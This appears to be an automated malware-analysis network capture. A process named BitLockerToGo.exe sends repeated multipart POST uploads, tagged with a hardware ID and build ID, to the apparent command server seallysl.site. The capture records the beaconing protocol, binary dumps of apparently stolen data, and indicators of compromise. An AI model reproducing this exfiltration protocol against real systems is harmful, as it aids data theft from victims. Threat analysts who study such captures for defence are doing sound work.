2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 35 4f 52 6e 72 77 58 45 42 67 6a 75 31 53 57 77 71 61 6c 2b 61 2b 57 79 59 4c 33 59 49 67 49 5a 32 4b 59 4c 64 37 6f 41 4a 47 70 68 34 5a 56 4c 38 56 43 54 75 5a 75 77 63 59 51 35 71 73 75 62 34 62 4e 67 48 47 34 6e 42 34 77 39 39 70 36 43 2f 48 41 67 7a 35 58 46 41 44 6f 68 55 66 4f 39 6a 34 54 56 6b 4c 32 62 36 72 75 58 31 59 64 49 65 36 4a 54 69 43 73 30 69 68 4c 49 6f 53 57 37 42 43 43 30 43 2b 57 30 42 74 33 37 55 66 52 45 32 43 6b 65 69 32 41 31 6b 64 33 61 39 6a 64 39 4f 34 64 61 67 34 67 41 4a 64 37 43 6b 45 54 72 5a 43 56 6a 76 52 75 31 6b 4c 56 59 72 6d 36 50 70 53 4a 67 76 4e 35 58 68 36 77 4e 6f 6d 39 43 6e 4a 44 51 79 33 54 6b 59 52 2f 68 56 56 4f 38 65 37 47 45 67 66 79 4b 36 72 36 45 41 68 62 61 4f 5a 4a 43 6d 57 69 6d 62 6b 47 49 77 41 53 Data Ascii: 5ORnrwXEBgju1SWwqal+a+WyYL3YIgIZ2KYLd7oAJGph4ZVL8VCTuZuwcYQ5qsub4bNgHG4nB4w99p6C/HAgz5XFADohUfO9j4TVkL2b6ruX1YdIe6JTiCs0ihLIoSW7BCC0C+W0Bt37UfRE2Ckei2A1kd3a9jd9O4dag4gAJd7CkETrZCVjvRu1kLVYrm6PpSJgvN5Xh6wNom9CnJDQy3TkYR/hVVO8e7GEgfyK6r6EAhbaOZJCmWimbkGIwAS
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 43 70 6b 56 51 64 4e 2b 31 48 30 31 4e 67 76 72 6d 76 6b 64 33 45 38 58 6e 63 58 54 47 33 69 48 32 5a 4a 68 61 56 65 45 59 58 68 76 69 47 77 64 70 33 36 4d 66 44 41 37 49 75 71 37 39 56 57 55 55 6f 34 6b 45 49 5a 53 4d 59 4c 59 68 69 46 74 69 6c 79 38 67 66 61 56 57 53 58 57 59 37 55 34 4c 51 35 71 6e 36 4b 5a 36 4a 68 76 64 69 47 31 76 69 38 30 75 35 67 4f 45 47 6b 4b 6d 47 41 38 4f 6c 31 74 41 65 6f 6e 72 53 45 52 43 39 4a 36 4a 76 67 30 6d 56 64 33 76 63 57 48 54 69 57 66 6d 62 74 64 47 46 2f 52 64 53 52 50 69 53 67 6c 69 33 2b 30 66 45 31 2b 55 36 4c 71 2b 47 79 59 55 6e 71 55 78 4b 5a 43 62 64 65 45 49 75 54 4e 43 70 67 38 49 55 37 31 5a 5a 6e 69 4f 38 57 46 31 47 4e 6d 6d 70 76 6c 56 64 78 50 54 39 79 78 76 79 37 51 32 37 6e 61 34 57 67 79 35 54 6b Data Ascii: CpkVQdN+1H01Ngvrmvkd3E8XncXTG3iH2ZJhaVeEYXhviGwdp36MfDA7Iuq79VWUUo4kEIZSMYLYhiFtily8gfaVWSXWY7U4LQ5qn6KZ6JhvdiG1vi80u5gOEGkKmGA8Ol1tAeonrSERC9J6Jvg0mVd3vcWHTiWfmbtdGF/RdSRPiSgli3+0fE1+U6Lq+GyYUnqUxKZCbdeEIuTNCpg8IU71ZZniO8WF1GNmmpvlVdxPT9yxvy7Q27na4Wgy5Tk
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 42 56 65 59 39 6c 4e 31 4d 2b 32 35 72 2b 34 42 51 46 43 4c 74 47 4e 68 30 35 55 32 2f 6e 61 71 42 6b 75 78 44 56 78 76 74 31 68 4c 4f 34 43 31 52 67 73 62 6d 76 44 37 73 41 4e 30 45 38 58 33 5a 43 79 42 6e 33 43 6c 49 49 52 54 63 70 38 6a 44 45 53 67 56 67 56 4b 6b 76 39 4a 58 67 37 4b 72 35 62 41 62 6e 52 55 6a 62 52 68 43 71 6e 50 52 37 41 31 68 78 70 4c 34 55 42 65 57 2f 41 4e 42 31 61 4e 2f 45 39 49 54 2f 2b 53 36 73 39 56 5a 56 4f 54 73 47 4d 77 33 5a 51 32 73 48 62 66 52 77 4c 68 48 46 34 62 38 42 4a 4a 64 70 37 34 55 55 67 66 79 4b 36 72 36 45 41 68 62 61 4f 59 4b 43 36 44 67 47 65 72 4d 70 45 71 63 6f 59 49 47 30 53 4f 61 33 42 71 6d 4f 73 64 62 51 37 4d 71 2b 69 77 41 33 34 54 78 66 63 45 4b 5a 61 4b 4e 75 68 32 67 31 51 55 34 53 45 56 51 71 42 Data Ascii: BVeY9lN1M+25r+4BQFCLtGNh05U2/naqBkuxDVxvt1hLO4C1RgsbmvD7sAN0E8X3ZCyBn3ClIIRTcp8jDESgVgVKkv9JXg7Kr5bAbnRUjbRhCqnPR7A1hxpL4UBeW/ANB1aN/E9IT/+S6s9VZVOTsGMw3ZQ2sHbfRwLhHF4b8BJJdp74UUgfyK6r6EAhbaOYKC6DgGerMpEqcoYIG0SOa3BqmOsdbQ7Mq+iwA34TxfcEKZaKNuh2g1QU4SEVQqB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49841	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:35 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: seallysl.site
2024-10-29 17:39:35 UTC	12854	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4A03C088025BBC2232B7EF3D1DE0FD84--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-10-29 17:39:37 UTC	1009	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5bef2sjfqaaejmqmmshoi9gdmd; expires=Sat, 22 Feb 2025 11:26:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NCp%2FfJKdN19Vs4L7A4cwck8xSc0kFA6ZRrblZYgEbTqy%2BOXbtMXYt9NnI%2BU136%2B9HZMuAAqLHkmDAMyL4qa24M6LiToIbqmDJkYHASTyt9lPIjZTVFEKoOMj3KAIwoy8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f225d91383a7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1566&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13791&delivery_rate=1836398&cwnd=247&unsent_bytes=0&cid=cd3c43aba58ebc95&ts=1072&x=0"
2024-10-29 17:39:37 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 17:39:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49851	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:38 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: seallysl.site
2024-10-29 17:39:38 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4A03C088025BBC2232B7EF3D1DE0FD84--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-10-29 17:39:38 UTC	1010	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u490c2e6gqegl8fsrb1198fa51; expires=Sat, 22 Feb 2025 11:26:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GU0EWwNTK%2Fm8rbCrxWIo1hrfdAZ4UX1J8%2B66AMHQnW%2Bdc6uUoo4wg%2F3diMmNxJ9WSCr9Ad3z7cnyFRq6QnfqpFHnh8xveQI5%2BwO1Y6P3DKmhiJvJGcYnwiF7bjim61Wj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f233d8f26b3d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2831&recv_bytes=16037&delivery_rate=2571936&cwnd=251&unsent_bytes=0&cid=326b8dea319d2da7&ts=593&x=0"
2024-10-29 17:39:38 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 17:39:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49862	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:39 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: seallysl.site
2024-10-29 17:39:39 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4A03C088025BBC2232B7EF3D1DE0FD84--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-10-29 17:39:39 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-10-29 17:39:40 UTC	1016	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1015s6k0mparac04vtmeuam8fl; expires=Sat, 22 Feb 2025 11:26:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xkgcX9Lk%2FI%2F8vb3qUaCeZ%2BZioic%2BqXRtHBI%2FiuzTGyAtrb%2Fb0WFVoD4PrmUSJy3umaF9lYJZcUUaNYJyoG0cRQK2gg2Oh4G%2Fb8WsOJ42%2BakDxhQUXPqXE2F8xUjD9Tou"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f23caa95e74a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1463&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20917&delivery_rate=1905263&cwnd=32&unsent_bytes=0&cid=632cbc0a24553f2d&ts=842&x=0"
2024-10-29 17:39:40 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 17:39:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49873	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:41 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1247 Host: seallysl.site
2024-10-29 17:39:41 UTC	1247	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4A03C088025BBC2232B7EF3D1DE0FD84--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-10-29 17:39:41 UTC	1009	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sn5cv08hf8a5thpmoa0kmnkfp3; expires=Sat, 22 Feb 2025 11:26:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBp6pNbQT32af%2FW37uFDGSV6UGR75CDTqq7esuobZcaGfnWVN9rX%2BimtV%2FLbAhUwpqbKdd0O1Lue3%2FbdSnoZSl%2B7QIfKFIKi3sPF6FlG8e3wuvTjtHH%2FJTBefFVLeeR9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f24799844551-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19940&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2161&delivery_rate=144366&cwnd=32&unsent_bytes=0&cid=0d7e9a34ca81fe0f&ts=655&x=0"
2024-10-29 17:39:41 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a Data Ascii: 11ok 173.254.250.72
2024-10-29 17:39:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49884	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:44 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 574762 Host: seallysl.site
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 30 33 43 30 38 38 30 32 35 42 42 43 32 32 33 32 42 37 45 46 33 44 31 44 45 30 46 44 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 6b 66 53 35 66 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"4A03C088025BBC2232B7EF3D1DE0FD84--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 14 50 19 83 72 5a 60 57 1b 77 e6 8c 02 c8 74 21 82 06 fa eb 11 fe 73 b8 41 76 68 4b 65 b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a 1b 3b d3 3a f9 13 e6 57 eb ea ec 63 82 Data Ascii: PrZ`Wwt!sAvhKelvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV';:Wc
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 2f 8c 01 82 be 30 22 53 92 82 9d 40 89 a4 2d 87 c0 dc cd 45 49 f1 09 b1 0e c8 75 35 62 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76 09 9a c3 91 26 83 6a 90 23 9d e5 58 eb Data Ascii: /0"S@-EIu5bSeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v&j#X
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: 00 ee 1d 5e c5 68 78 b3 55 b0 d9 bd c0 8b bd 6f f5 dc 66 d3 ba 73 1b ef 98 e4 05 7e e0 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad fd d7 70 cf 7e 4e 27 87 15 aa e0 be fc Data Ascii: ^hxUofs~UL:\,\|Lham3'qKk+8)qfaE#}uUE6_\|j7<PzLl6ZTBpZlwRCYW:P[pf*!\\|~^lTEd\|'^z/6KY#V0p~N'
2024-10-29 17:39:44 UTC	15331	OUT	Data Raw: b6 1a 08 e5 5e c5 23 e8 1a 7f 65 e5 a5 4f d2 5c ad 1d de 18 98 e3 32 4b c1 8c 1e 99 ac 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd ff ce d9 75 49 50 fa 8b 07 a9 04 f3 20 Data Ascii: ^#eO\2KwQEibq4hcBc:t7EoG;0_7j\|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6*~{4?N^c_2nuIP
